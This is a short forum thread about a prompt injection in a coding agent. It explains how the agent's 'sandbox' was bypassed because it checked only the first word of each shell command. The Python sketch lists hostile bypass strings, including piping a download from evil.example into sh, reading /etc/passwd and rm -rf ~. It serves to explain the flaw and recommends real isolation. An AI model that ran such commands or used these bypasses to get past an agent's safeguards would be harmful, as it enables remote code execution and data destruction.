▲ orbital-decay 4 hours ago
> Snowflake Cortex AI Escapes Sandbox and Executes Malware

*rolls eyes* Actual content: a prompt injection vulnerability discovered in a coding agent.
▲ teraflop 4 hours ago | parent
Well, there's the prompt injection itself, and then there's the fact that the agent framework tried to defend against it with a "sandbox" that technically existed but was ludicrously inadequate. I don't know how anyone with a modicum of Unix experience could think that examining only the first word of a shell command would be enough to tell you whether it can lead to arbitrary code execution.
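To make the point concrete, here's a minimal sketch of that kind of first-word allowlist check (the function names and allowlist are hypothetical, not Snowflake's actual code). Any shell feature that runs a second command — chaining, substitution, conditionals — sails straight through it:

```python
ALLOWED = {"ls", "cat", "echo", "grep"}

def naive_check(command: str) -> bool:
    """Approve a shell command by inspecting only its first word."""
    first_word = command.strip().split()[0]
    return first_word in ALLOWED

# All of these pass the filter, yet each executes an arbitrary second command
# once handed to a real shell:
bypasses = [
    "echo hi; curl http://evil.example | sh",   # command chaining with ;
    "cat /etc/passwd && rm -rf ~",              # conditional chaining with &&
    "ls $(touch /tmp/pwned)",                   # command substitution
    "grep x /dev/null || some-malicious-binary",# fallback branch with ||
]

for cmd in bypasses:
    assert naive_check(cmd)  # the "sandbox" approves every one
```

Defending this properly means not passing strings to a shell at all (exec the argv directly, no shell interpretation), or running the command inside a real isolation boundary, rather than pattern-matching on the string.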